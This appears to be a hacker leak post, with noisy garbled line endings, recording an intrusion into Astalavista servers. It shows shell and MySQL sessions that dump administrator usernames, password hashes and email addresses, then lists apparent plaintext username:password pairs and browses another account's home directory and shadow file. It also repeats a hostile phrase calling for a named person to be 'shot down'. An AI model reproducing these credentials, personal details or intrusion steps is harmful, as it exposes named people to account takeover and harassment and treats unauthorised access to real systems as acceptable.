<description>All availably Exploits.</description>
6 e* a8 |# l( a1 n. d <language>en-us</language>, ^/ U& {' R( J- f' B; V& Y% W& n6 o
<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
+ _) Q" Q5 K5 o& C, d# W <docs>http://blogs.law.harvard.edu/tech/rss</docs>
# g3 }# P# s3 y5 p+ Q( o' ] <generator>Astalavista.com</generator>
5 d4 w0 ?- E* f: z <webMaster>info@astalavista.com</webMaster>’ . $items . ‘
5 l) r: J8 t/ G </channel>
' ?6 [! N& o: w& d9 l1 i) `. E* p</rss>’;5 h# S9 l/ i$ `; B' e. O$ r* Q, i
& y8 h0 ], B) H4 d
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {( ~! y0 F( i4 H. ^/ s% n+ B
unlink (FULLPATH . ‘/feed/exploits.xml’);0 R* O( ]8 u: G- N, Y
} s a! r* l( n- h% I) R0 s
4 e, r! F2 Q4 G3 b
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
+ |$ B2 O" e( m g+ G[snip]; q/ }4 T! D+ c
. a4 \" T' {+ o' _
sh-3.2$ cat exploits.sh' @! Y4 k, I" x: H8 r, U+ K) Y
#!/bin/sh+ s( @+ r4 Q4 r- ~' Y
" D. j. e, |9 w8 H0 h1 C###########################################################0 M9 i& G* p) j. p4 D
# #
, f! G4 h4 d+ e# Title: milw0rm exploits adder #) o; H- b3 q" V2 y. w2 u
# Description: Add all milw0rm exploits to the # t9 O1 Q$ p- O. a% `4 t* E8 @
# Astalavista.com database #1 U4 e4 P5 [( b- @
# #
% X( i, Q2 A s* r& `* H% i# Company: Astalavista Group #; n, J T2 ]' r1 G
# Author: Paulo M. Santos #
r8 V6 z, |3 z! p7 _ Y2 ?# E-Mail: 链接标记paulo.santos@astalavista.ch ## [7 t* M" }1 a i9 [
# #1 j5 h$ k; _* y: g0 w' K2 D
###########################################################/ m, `' q. r' D
4 k8 Q7 s k9 T4 P# path
& ~& ~- ~0 y, O/ fthis_path=/home/com/public_html/modifications/cronjobs
& x7 H8 P( \; O. W9 O) F6 W( m2 q- B' c
# change directory) c0 e, F- J8 n
cd $this_path
' _8 [. C3 {% ] Z0 x' vcd tmp/
0 c* K: |) w" K' _9 L- B2 F, \, T- l: N9 |
# delete files
4 L1 B6 p& G. B% @2 n; | irm -rf milw0rm.tar.* &
3 `. _# |' H, Prm -rf milw0rm/ &
( a3 j' |3 @+ F/ a/ V3 m( p: s: |' m, `) e
# wget milw0rm paket' u+ [/ ]) u x
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url], {7 x; c2 A2 ~% W
: O T) `- g2 S& i& D# K( O
# extract milw0rm paket
+ `+ F9 `5 m' utar -xvf milw0rm.tar.bz2
6 L U" v+ t6 B+ P. o; c9 ^$ I/ S5 _, y/ w! Y" a
# change owner
; M/ o: x: x. c- Z3 x* ?# G4 Zchown -R com .
2 O8 N, z! c( o5 \chgrp -R com .
8 H' D) Z9 s! Q& V. ~3 b$ ]( n9 C$ x; L) @$ n( ^
# execute php script1 W9 y% j' W% z* `7 k
cd $this_path
- |+ A u! V( B _php -q exploits.php1 L# f9 y& H* q' Q4 t
. f! p/ o& f6 E- [# delete files
S9 |/ c H" I/ b6 Srm -rf tmp/milw0rm.tar.*( g J$ ?/ p/ S6 D
rm -rf tmp/milw0rm/
4 z& X8 T8 E# W' v% u
1 C, [2 U4 r l0 I. ]* Xsh-3.2$ echo “Paulo M. Santos needs to be shot down.”# Q) N/ R r# ~( J U. }
Paulo M. Santos needs to be shot down.: L+ z5 r+ h8 `8 w. N! X: v
4 J6 U6 j4 {! ^9 V& o) u
mysql -u contrexxuser2 -p1 @- g. u( h" G, I
Enter password:0 ^! `' L- S& t4 O5 l2 ^) u% k* v8 g
Welcome to the MySQL monitor. Commands end with ; or \g.
% \- o% f: F& j6 K3 p. rYour MySQL connection id is 261694
% [0 a( C% {7 \3 m% wServer version: 5.0.45-community-log MySQL Community Edition (GPL)/ |/ Z: y# }& o6 }# Q
5 o) u+ O M& k/ z) l) e
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
) Q) D) W0 R. I. H( k0 h& k8 \) ^8 t$ r. I
mysql> show databases;- P' C# e+ M/ X# {8 b( B; M
+——————–+8 h% R1 _0 S- y3 T" \! l
| Database |
4 }* \ S( _0 O7 C+——————–+
/ ?/ I* m: A: b| information_schema |
C( J' B, N8 F. v+ Q% A| com_contrexx2 | {7 y O, ~9 _& ~1 w& k1 d
| com_contrexx2_live |* m& S6 R) E5 d! l& [
| test |
1 s9 H$ T; H0 {+——————–+$ n& L0 h+ n' {1 m4 p" w$ R0 [
4 rows in set (0.00 sec)
6 J% C/ i' X: l% H- e) O t/ H4 B$ P, Q8 I, l
mysql> use com_contrexx2_live
9 v0 [) z4 w- O* pDatabase changed
, e- s' u. e$ Cmysql> show tables;
r1 P6 Q* I$ M2 S; Q% }3 l+————————————————–+
7 ^, `, B) y6 B& H0 m| Tables_in_com_contrexx2_live |
" A" F$ L; x0 }, L: Z( v- \, V+————————————————–+
8 J; y1 C# Z0 F| cc_banner_counter |- E$ t2 J! L3 n
| cc_search_counter |
1 j* \4 x; n3 t7 b+ R& ?| contrexx_access_group_dynamic_ids |
# A2 y0 B* \" C) P) l: d| contrexx_access_group_static_ids |& d& }' F/ E8 N3 I
| contrexx_access_rel_user_group |0 s# R( i8 H' L' [8 W8 }; V
| contrexx_access_settings |# j: |; d& V: D: R/ l5 Q1 b) n
| contrexx_access_user_attribute |
3 H2 A$ k- r8 _5 [- U: h ^| contrexx_access_user_attribute_name |
! o" e1 y0 b- T| contrexx_access_user_attribute_value |5 r2 k' Q% V5 L) l, Y
| contrexx_access_user_core_attribute |9 G* d9 Y" {; g8 @4 h* G
| contrexx_access_user_groups |
3 L* ~9 M+ }0 s- f/ v| contrexx_access_user_mail |& F; l2 U# i/ E3 N8 ]
| contrexx_access_user_profile |
# p8 Y$ K* j7 b! {$ Y| contrexx_access_user_title |
" c0 b y* _1 f2 ~+ `! {1 t| contrexx_access_user_validity |' H5 d* y, g0 g- d9 C. Y9 V
| contrexx_access_users |
! [& j/ p0 y0 K% \| contrexx_backend_areas |
* B& I* O# S) Z, D4 q. ?' e| contrexx_backups | h* _3 u7 m7 [1 m) ~% Y
| contrexx_content |$ q! p7 C: q+ u$ J+ o: n4 e+ _2 e
| contrexx_content_history |
: \; I: B2 D. `- n- c9 T0 c6 X( }| contrexx_content_logfile |
% U$ u! P# s2 y0 r$ I0 `0 j% w| contrexx_content_navigation |
$ k+ r% R9 K0 p( {| contrexx_content_navigation_history |
% }6 I$ b7 u7 O% S| contrexx_ids |
! F4 ]3 L! p* h0 t( r| contrexx_languages |, Q3 E$ J) V7 K) B7 J9 A( i
| contrexx_lib_country |4 j# D" H" L) w" j4 _) [. s- z
| contrexx_log |5 k3 j0 V& N" d
| contrexx_module_alias_source |$ {" N2 O7 Q- _2 @, \
| contrexx_module_alias_target |% g6 a4 o8 l3 T& Y& [
| contrexx_module_block_blocks |" }& Z& J2 ? ]( h8 G
| contrexx_module_block_rel_lang |
0 b' v+ A3 G- b& C+ b| contrexx_module_block_rel_pages |2 p$ i+ Z1 p; g \0 v i2 B$ f
| contrexx_module_block_settings |# b, E: Z1 e0 P5 e0 j
| contrexx_module_blog_categories |
# J5 J" Q: A& S2 N) Q0 m" P1 |: || contrexx_module_blog_comments |3 s: M* `- @ n" l$ Z! [
| contrexx_module_blog_message_to_category |
6 w5 ?0 ~4 ~9 c4 y N+ |3 a| contrexx_module_blog_messages |# F0 C# a$ l& A
| contrexx_module_blog_messages_lang |
% l0 }! p, }0 \: k% H3 o| contrexx_module_blog_networks |8 A2 J O' o$ w F- v- O
| contrexx_module_blog_networks_lang |5 A& u9 E+ {" b) P% {" K4 x
| contrexx_module_blog_settings |% W! k4 A0 ?: p1 @ O- ~6 N1 b
| contrexx_module_blog_votes |
, v( P8 L- Y4 X9 A3 p X| contrexx_module_calendar |# Y: ?+ O$ F4 f' ^* N
| contrexx_module_calendar_access |
6 z/ {3 f/ ~4 q: v% d| contrexx_module_calendar_categories |) S) F/ D8 y- P
| contrexx_module_calendar_form_data |7 F$ c1 [" F7 d. n: o7 ~: ]" E
| contrexx_module_calendar_form_fields |, ]! R" J+ Q$ O: W* [4 z& Q6 G7 |
| contrexx_module_calendar_registrations |1 ~4 V% Z) n0 ~; t( q
| contrexx_module_calendar_settings |% O4 l! ], u0 r5 }0 H
| contrexx_module_calendar_style |, d- O0 R7 Q- A- o7 B8 w# P
| contrexx_module_contact_form |) ^' M( e1 C& ?, [0 f4 C( e
| contrexx_module_contact_form_data |* E1 B/ t1 w1 U9 V! f
| contrexx_module_contact_form_field |5 n, e" W {' B% @1 b. i4 u( P7 \
| contrexx_module_contact_settings |
, n$ M. [4 V( Q4 m+ ^| contrexx_module_data_categories |# W+ \5 x! q4 X2 c/ K) F+ t
| contrexx_module_data_message_to_category |
1 R/ n( _! j; p$ @" N* i| contrexx_module_data_messages |
, n+ t/ N/ e- A" ]+ \+ p, B| contrexx_module_data_messages_lang | Y- D1 M; R+ q3 a. M* _" @
| contrexx_module_data_placeholders |- t7 [5 H* ^9 L/ `
| contrexx_module_data_settings |
6 [" c8 [" b, o0 W. W Q| contrexx_module_directory_access |
& C; V% ~3 I! P| contrexx_module_directory_categories |/ o5 g1 \1 K5 B% u }2 h- S
| contrexx_module_directory_dir |
4 i( l$ ^9 V- J+ {$ v( F, I; u% a| contrexx_module_directory_inputfields |
: h. f8 v- ?, j- C| contrexx_module_directory_levels |
$ Y- W/ C3 F, L| contrexx_module_directory_mail |
, V ~. ]2 K9 k( Z| contrexx_module_directory_rel_dir_cat |
" |+ q9 t% J! j0 d$ S4 W7 ^| contrexx_module_directory_rel_dir_level |
3 \! \! b( b" a5 B& ^5 T: X9 s| contrexx_module_directory_settings |% n; Y* F1 N( d6 y5 s9 V6 D s
| contrexx_module_directory_settings_google |
$ g5 g3 Q2 l: a- k| contrexx_module_directory_vote |
& U" Y2 h" e) O4 `: D| contrexx_module_docsys |
$ e1 o. X( Y- M7 S4 Y4 T- F K: i+ B| contrexx_module_docsys_categories |
/ \9 ^$ c/ ]$ L% C6 Z- T1 C- ? _| contrexx_module_egov_configuration |" A, b0 a* j/ R. ]* J! ?9 ?
| contrexx_module_egov_orders |
- y* s, m3 F9 y; \5 O; B3 \| contrexx_module_egov_product_calendar |
, z. F! A! P- f7 C! K1 I. ]| contrexx_module_egov_product_fields |9 R& M9 ^2 X8 [
| contrexx_module_egov_products |1 t8 l! P0 H/ F+ i% d
| contrexx_module_egov_settings |4 Z. G# i/ v/ U! `; E6 c2 `
| contrexx_module_exploits |
/ E; O- k/ L/ B% Y| contrexx_module_exploits_categories |
7 A' g" a- a H2 F| contrexx_module_feed_category |
' b+ q1 D6 x9 x- _& z# c! i| contrexx_module_feed_news |
# C. w! x8 t- y4 o+ J) x. `3 C0 X8 p| contrexx_module_feed_newsml_association |) V+ j2 N; ~- N1 |0 A
| contrexx_module_feed_newsml_categories |. P) O$ f' M1 s% K" u9 y: [
| contrexx_module_feed_newsml_documents |( Z, p5 Q* a+ S
| contrexx_module_feed_newsml_providers |# }& j! @$ K/ u9 y; Y4 c- q' l
| contrexx_module_forum_access |5 c8 N/ `1 \4 x8 y) o
| contrexx_module_forum_categories |* n+ s( C& h0 t& v" J: k- g
| contrexx_module_forum_categories_lang |- |( y4 g( k" x( ?
| contrexx_module_forum_notification |, ?' Z# B7 K- `2 r \9 m/ N- S
| contrexx_module_forum_postings |
- @) J* `. O2 {| contrexx_module_forum_rating |$ Q0 z( G* K+ |
| contrexx_module_forum_settings |
+ o# \% B; C$ a* ~| contrexx_module_forum_statistics |7 s0 C: G! z3 X& z9 W
| contrexx_module_gallery_categories |. p$ u% s X# C
| contrexx_module_gallery_comments |4 e# ]" }; ]. U9 q4 c1 s0 j
| contrexx_module_gallery_language |
' s* k' V$ S5 U9 @! _, z| contrexx_module_gallery_language_pics |! l6 Y1 O$ ~. r& Y8 L
| contrexx_module_gallery_pictures |
: w1 E' v$ A4 g% j8 [, i) ?| contrexx_module_gallery_settings |
5 |8 [8 f; q8 t( F+ |. d| contrexx_module_gallery_votes |
. A7 O: E8 {6 V3 t| contrexx_module_guestbook |% a$ e9 t8 k: } m* d/ ]
| contrexx_module_guestbook_settings |
: C: w; |% P& q. I4 m2 q! U* v| contrexx_module_livecam |' |+ K L' R* V' G
| contrexx_module_livecam_settings |
" E! o( {- K- z4 n, F| contrexx_module_market |8 Z6 z3 W A2 b9 Z" l
| contrexx_module_market_access |
3 v2 n5 l, D* M/ }7 P- n: u| contrexx_module_market_categories |
# r9 m# o( [8 G# L/ t| contrexx_module_market_mail |; E! F* u7 | x; l: B; q
| contrexx_module_market_paypal |
: K, @0 _+ C8 ~. L) ]. m| contrexx_module_market_settings |" f7 W. c( l0 ]/ U* Q
| contrexx_module_market_spez_fields |; Z3 S7 ]( x" ~7 v2 k
| contrexx_module_mediadir_access |
) j- f" X/ n* S. I! n' V+ @) k| contrexx_module_mediadir_categories |
' n" H: y* B& X7 l8 l N| contrexx_module_mediadir_comments |3 B$ w: v# C9 [9 D& i$ p
| contrexx_module_mediadir_dir |* e; ~% ~0 m. j7 ?
| contrexx_module_mediadir_inputfields |
# z0 t! l5 \- V5 ^' j9 s. f0 ]$ q' E| contrexx_module_mediadir_levels |: z. ~- ]$ [5 d6 U6 ~
| contrexx_module_mediadir_mail |
2 I" T# r, y- B2 }; ]* s| contrexx_module_mediadir_rel_dir_cat |
; W4 c5 m$ r2 V0 g6 e| contrexx_module_mediadir_rel_dir_level |
6 d3 g2 X% K1 Q2 {4 k; a, D| contrexx_module_mediadir_reports |+ `' j8 p$ ~9 t
| contrexx_module_mediadir_settings |
y9 ?9 m5 W6 w, H- S| contrexx_module_mediadir_settings_google |8 k5 Y1 R: V- l8 @! `
| contrexx_module_mediadir_vote |+ \+ F1 C, G6 z3 T' a
| contrexx_module_memberdir_directories |1 `# ^3 {% P7 T# W' O5 ?7 r; Z
| contrexx_module_memberdir_name |
4 v: q. D+ S2 S, o+ A1 j| contrexx_module_memberdir_settings |: M8 K. |& E2 e! R% k
| contrexx_module_memberdir_values |
' }# I' A E I( ^* e" {| contrexx_module_nettools_allowed_groups |6 P L! S2 A$ Y6 `& }- l& O4 V! @
| contrexx_module_nettools_settings |+ G" B0 I! x' m& b' r
| contrexx_module_news |* \9 N) D2 f6 o: s" ^
| contrexx_module_news_access |
- F9 X& L. A2 a! {% V o| contrexx_module_news_categories |* g, h6 M: v: v% e# N/ I4 `% u
| contrexx_module_news_settings |. {+ w ]4 [9 J/ p9 R! W
| contrexx_module_news_teaser_frame |
1 I7 Q+ ]9 t+ B1 J3 t| contrexx_module_news_teaser_frame_templates |9 }; K* ]% q" c. O4 |% x2 g
| contrexx_module_news_ticker |8 k- T4 J$ w% R
| contrexx_module_newsletter |: L' z( K2 ^% w1 w$ X& {0 n6 m7 [
| contrexx_module_newsletter_attachment |
% h: l( h6 \: d' C7 P| contrexx_module_newsletter_category |5 a! \: `$ ]8 N; a( B: r
| contrexx_module_newsletter_confirm_mail |
2 R6 {& f; j3 m' t: w7 H2 I# J| contrexx_module_newsletter_rel_cat_news |6 y3 v% G# m f& e
| contrexx_module_newsletter_rel_user_cat |
4 N. O3 e8 b1 f; G6 s. g2 r| contrexx_module_newsletter_settings |
7 P1 \+ c' l7 d9 @0 j| contrexx_module_newsletter_template |- [- G4 @' J" B; o( \; W" L, ]% B
| contrexx_module_newsletter_tmp_sending |
$ N8 V( ^1 k0 T3 d9 u| contrexx_module_newsletter_user |) h4 A1 U, ?* g! v/ \! y/ U, s
| contrexx_module_newsletter_user_title |
9 S! M/ z/ ?; G. B/ X| contrexx_module_onlinetools_defaultports |2 {9 `+ j D6 L) t
| contrexx_module_onlinetools_defaultports_back |
! o! O; W1 b2 X0 q/ j1 P| contrexx_module_onlinetools_geolitecity_blocks |5 V% A4 q9 U) [; a. H& H2 l2 ?) [
| contrexx_module_onlinetools_geolitecity_country | F; `) U1 |8 S: S4 f! }+ ~1 w
| contrexx_module_onlinetools_geolitecity_location |/ c. j4 _, ~7 b) |% \! {
| contrexx_module_podcast_category |0 r: i( _( R6 Q9 c
| contrexx_module_podcast_medium |
5 ^" K, ?9 _8 K9 W1 @| contrexx_module_podcast_rel_category_lang |
. e+ p( O/ J! l6 z6 u| contrexx_module_podcast_rel_medium_category |, k& w4 S- I9 B* e
| contrexx_module_podcast_settings |& y6 z) V6 L. t1 |+ F
| contrexx_module_podcast_template |
0 ~5 M& h% n0 C. m, h* q7 q9 u| contrexx_module_proxydb |
" O8 \$ u. D) L0 L) J% l3 [| contrexx_module_recommend |+ c. V7 h2 M- ]' Y( {
| contrexx_module_repository |( J" {; W" f! [" b' g4 K' @
| contrexx_module_securitynews_cats |, u4 p9 t- k% T+ m3 j7 Q8 n) a
| contrexx_module_securitynews_feeds |4 n1 S* p9 h0 R# M2 G$ }9 r/ M( I
| contrexx_module_securitynews_news |0 ^: E$ a y7 M5 S0 J( Q; I
| contrexx_module_shop_categories |
7 H+ A1 `* X& g$ X| contrexx_module_shop_config |
, E2 q5 T4 b# Q9 R3 p| contrexx_module_shop_countries |
4 C, u" T, b" W/ x" S| contrexx_module_shop_currencies |
8 r$ B; a( ^% S# n| contrexx_module_shop_customers |
& ^. r P4 O. z7 L5 N2 s| contrexx_module_shop_importimg |4 K0 a8 o4 t7 o: @+ _# M
| contrexx_module_shop_lsv |0 [! N. H, M, U$ Q- Z
| contrexx_module_shop_mail |2 e( B% [# p% ?
| contrexx_module_shop_mail_content |
+ J) N. `/ }0 D) [& r| contrexx_module_shop_manufacturer |; P& D4 z6 o+ Y! k, c
| contrexx_module_shop_order_items |( G7 q/ [6 e. l
| contrexx_module_shop_order_items_attributes |7 W& C3 ^: z8 n
| contrexx_module_shop_orders |
; |& {5 E' W3 ? I4 P| contrexx_module_shop_payment |" I# P# _7 H) {8 x( `
| contrexx_module_shop_payment_processors |& k3 N- v7 b; g8 t5 X* A
| contrexx_module_shop_pricelists |
) M+ s2 @7 U2 F% l) I. Y| contrexx_module_shop_products |3 N. q- @- t- G' ?% S( v0 }
| contrexx_module_shop_products_attributes |5 b* S# _# T2 X" F3 p3 u( l
| contrexx_module_shop_products_attributes_name |( {- v) r' X: P* Y* J C& Z& W- i
| contrexx_module_shop_products_attributes_value |
1 z( J \6 R. @! ^ m| contrexx_module_shop_products_downloads |4 ]4 h! D0 T7 f0 g1 V" ^# o
| contrexx_module_shop_rel_countries |: j2 q: z& F; D
| contrexx_module_shop_rel_payment |
K) H3 z6 p. R2 p0 o% P. O# v| contrexx_module_shop_rel_shipment |
% m) A" C" b: `& X6 |. Z) ?$ l; W+ V| contrexx_module_shop_shipment_cost |
: H) s8 e3 W6 x" q# _| contrexx_module_shop_shipper |4 o7 q5 y, ~) {# ^
| contrexx_module_shop_vat |, a. [4 e' ?; ~
| contrexx_module_shop_zones |
/ H: F# r6 V9 \. Q* H| contrexx_module_u2u_address_list |
4 K3 {9 E. v. F$ [| contrexx_module_u2u_message_log |1 r/ P4 P1 F1 l! {1 @4 J
| contrexx_module_u2u_sent_messages |: S3 m( o+ G* [/ N9 P
| contrexx_module_u2u_settings |' F( O8 V( J; F' |1 _/ v' R! }# s9 Q
| contrexx_module_u2u_user_log |
' e1 Y* D1 w1 r* n| contrexx_modules |
' f8 n8 w5 |4 }" u" X| contrexx_sessions |$ W4 X: {1 r4 x' j: O- F
| contrexx_settings |# U5 M. G" r) \( W+ ^* ~" `/ \
| contrexx_settings_smtp |
1 p0 S7 s' d- G8 h: `| contrexx_skins |
1 G! X3 o! h+ ]! ^; U2 X* `| contrexx_stats_browser |
9 ?4 u2 t3 |7 b5 w! E| contrexx_stats_colourdepth |3 m: Z: W' T& U! z- ]8 \
| contrexx_stats_config |
6 W+ U5 M/ M/ B% y| contrexx_stats_country |
- t' @* _8 G# {; l/ [# z| contrexx_stats_hostname |
" n7 ~7 N' ^4 {* l| contrexx_stats_javascript |0 w* G. H* m1 O& X
| contrexx_stats_operatingsystem |
2 K3 ^1 C+ g# \| contrexx_stats_referer |, t+ x: e' w1 \' Y' `. T3 h
| contrexx_stats_requests |
( B" ], O7 h# x4 E g| contrexx_stats_requests_summary |/ m# e7 j, ^# f) k
| contrexx_stats_screenresolution |& A. V) f/ l) y6 }+ G
| contrexx_stats_search |3 j1 r1 E, w9 S6 c# \
| contrexx_stats_spiders |* r( a+ v+ I3 M4 ]. O( _! r
| contrexx_stats_spiders_summary |. M/ `" S# ~0 S' s/ r+ L9 e( s
| contrexx_stats_visitors |
' I7 D% E/ @4 h: Q3 u| contrexx_stats_visitors_summary |( u/ e8 ^0 U% [5 j6 @6 j
| contrexx_voting_additionaldata |/ K- d; }. p* j6 W6 p6 ]0 ]. x0 ] ^
| contrexx_voting_email |. R! ~7 ]- h o7 N4 o' i# s: b& t+ h
| contrexx_voting_rel_email_system |+ v x* Q+ L6 {6 l
| contrexx_voting_results |
' D+ y8 U' m8 Z$ M7 K p% j| contrexx_voting_system |* h8 h0 k- p/ ?$ o4 V
| foo |
! f$ D/ |" Z, w9 L+————————————————–+
9 r5 Z/ U$ j% u' i, _; Y# s227 rows in set (0.01 sec)2 ]: c8 B; ^4 U- D
) p- H2 e: N ?0 i/ _0 ~mysql> select count(*) as skids from contrexx_access_users;6 w0 m. c* x% Y( j8 @
+——-+
8 _4 T( D j. ^' w N n| skids |
9 ^$ V7 t& |2 e6 e+——-+
. Q* }$ Z7 a7 ], i| 53699 |1 T: J( @ q8 [: b8 Y6 m7 }2 N$ V3 _
+——-+
. V; Z9 C7 [$ L, x" h, f6 r8 y1 row in set (0.00 sec)
6 d6 h4 `. F+ D1 e3 p6 u6 B& x/ b- e6 {4 A4 a+ ~& X- ^
mysql> describe contrexx_access_users;
! J* N3 Z; O1 R! [0 H+——————+——————————————+——+—–+————–+—————-+
0 y( D: {2 z% u K8 E9 u| Field | Type | Null | Key | Default | Extra |& P9 f) u; ~' L
+——————+——————————————+——+—–+————–+—————-+
7 ? W0 F! M3 N5 g& l$ e2 \| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
" H* H$ I' h( h) c. f0 I. P| is_admin | tinyint(1) unsigned | NO | | 0 | |# W. c9 A& c8 ~/ j3 J) D4 O
| username | varchar(40) | YES | MUL | NULL | |
- ~7 ]) H8 ?9 t; u6 C3 t| password | varchar(32) | YES | | NULL | |
3 b |2 B+ \; [0 m0 _7 X! q| regdate | int(14) unsigned | NO | | 0 | |
! j9 x& g* \3 g8 E* P) q| expiration | int(14) unsigned | NO | | 0 | |
, C2 t ~9 k- T) f y6 {, B| validity | int(10) unsigned | NO | | 0 | |/ a, O4 ]; N: X8 U, p5 p! |9 R$ @% ~
| last_auth | int(14) unsigned | NO | | 0 | |; H, m" z! m5 z1 ^+ M& h/ v
| last_activity | int(14) unsigned | NO | | 0 | |
: H3 v' ~, _; d| email | varchar(255) | YES | | NULL | |
4 J& P4 Z; ^3 H& M; U/ d2 Y| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
6 J- G9 a7 y/ m6 y( Q% S| frontend_lang_id | int(2) unsigned | NO | | 0 | |
" @2 W2 K, Q' s3 l8 L! f* k| backend_lang_id | int(2) unsigned | NO | | 0 | |
' U- K$ `6 L0 O' h2 U; n| active | tinyint(1) | NO | | 0 | |
$ |( c7 [0 o5 p| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
1 `6 d5 F0 }9 i# G5 F8 N| restore_key | varchar(32) | NO | | | |& a& [# l4 j, o; i/ _
| restore_key_time | int(14) unsigned | NO | | 0 | |
2 }& p8 T1 `+ n2 l2 s! U/ q9 }| u2u_active | enum(’0′,’1′) | NO | | 1 | |
; @) f" p0 W1 P' @& f+——————+——————————————+——+—–+————–+—————-+
% w7 M: x/ ?5 b( }9 D: f6 Z18 rows in set (0.00 sec)
! t2 K5 X6 a9 a) y2 i4 N3 {! Z# m2 Q* O. \) ~$ W; \
mysql> select username,password,email from contrexx_access_users where is_admin = 1;
# P7 }" D" W% r& ^; N4 `+ B+————+———————————-+—————————–+
( n' X8 O* Z5 p| username | password | email |
3 ^2 U: v S, s, X- e+————+———————————-+—————————–+# g! {' X( w9 u7 O5 N$ w
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |+ Z# K I- ?0 ~, M3 A
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
. k( h1 ]2 A8 z| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
3 a) V$ `6 u& X G( n" |/ g| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |
3 B E/ e- r% `0 s( O; }+————+———————————-+—————————–+
0 n9 l9 I5 e4 Q. G4 rows in set (0.04 sec)* J+ G1 J. \9 g, f8 R3 }
+ ^7 e0 c, P7 x8 \mysql> exit;5 D5 m! g% s+ F: o& j; e" w
Bye# ^ d0 Z* R) G8 {4 E
% v+ t) c3 r d1 z[~] There you go, your “team of security and IT professionals” is a joke." j& G" p& C, B9 @. s
% E5 r8 U+ Q0 U' [9 o
+——————————+
# b) m* b3 _1 b; ~system:f82BN3+_*
! W# ]- {/ t: E5 {) a/ O! E& JBe1er0ph0r:belerophor4astacom+ X: E! |% a7 R3 o2 q" ?9 u
prozac:asta4cms!# W7 u+ k5 O N: c J
commander:mpbdaagf6m7 N- S$ p( b+ M
sykadul:ak29eral- M/ g; M; e) e P8 @
+——————————+
. I T! C7 h& }7 B. R. ~3 ^, e2 D0 n0 n) [1 I, R( @2 u9 k
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)# I G. {3 q+ G+ v' T2 g
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.4 P8 v, X; \# I
. B# ]* Z3 {" j5 T+ L$ o[~] Lets move to astalavista.net now,: r- L+ ], c& ]3 Y1 s% `
! }: R# H/ o2 \% d" w
From <链接标记[url]https://www.astalavista.net/[/url]>:& ?& }# O0 h0 I4 b4 `% j) m' S
>> Everyone knows that the best defense is a good offense.
* E; N7 z4 k6 z$ C1 W>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.$ c) \4 J/ D& U
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
E+ V. R; ^$ F8 f>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”6 a% r1 }/ {8 x, R3 m5 L/ L
6 f: ?1 @) w f4 h3 S
>> Go ahead, try and hack our server . in a completely legal way!! q7 Q' c4 x! j8 F
>> Learn by doing: We offer our members tricky tasks and challenges on an7 }* _& p w9 w2 t) m- F( R7 v. ` h
>> ongoing basis so you can test your knowledge and abilities. You can also
4 |0 }2 ~; Z! z4 m: r>> demonstrate what you.ve mastered by taking part in regular hacker contests
3 G& ~2 F$ @4 E- L0 ~; k# t8 Y>> and war games; Y* T3 v/ O+ Z+ p
5 L3 p2 `, } m- ^3 N0 j[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
( t; o3 z1 W8 F8 x
. E1 S5 P) U& a/ x4 p7 ^! F" @[-] Tricky task: Find home dir of astalavista.net
( h$ }+ ]9 w% L8 |8 j! z5 R7 ^* Q
sh-3.2$ ls -la ~astanet
2 R4 ]9 m2 |" U2 m/ \1 B; Rtotal 48+ x. n I* t+ Q% y
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 ." N+ s% |% o9 A0 y# P
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
H' a6 i( q) |+ udrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth* I3 r/ D5 F" X! \) q7 `5 t
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history, m& f; r3 B, a' a
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout" [# l" p2 X. s3 d
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
( T" Y2 R& J9 q6 ~! r! e: k-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
: b( x' ~" H2 t! D% ddrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains8 s. J( u+ w$ M! j% f
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap1 l. Y# d6 X: E: V |% d/ z
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
' g! j/ N D4 s, L# @6 B4 Ylrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html# k- \! E: o, G# n+ l% D
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
% X+ ?' T6 j3 e9 `8 D/ F$ G6 p
4 e5 G$ h( `8 E8 \4 Q% psh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
. e& a+ k5 p1 c( B. u) p& m# s9 O4 u' Tsh-3.2$ ls -la5 p9 X; A/ s% p) M' T* W/ r
total 200
$ z1 a2 a! p1 t; J7 G% f$ }# r; Qdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .7 S* M& C. p! \) v
drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 .." ?, e! r3 c, ]$ }# b) f+ V
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007* l9 ~& [% z$ E1 N
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql8 r v: O& w+ X! l$ ~( N$ c
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com
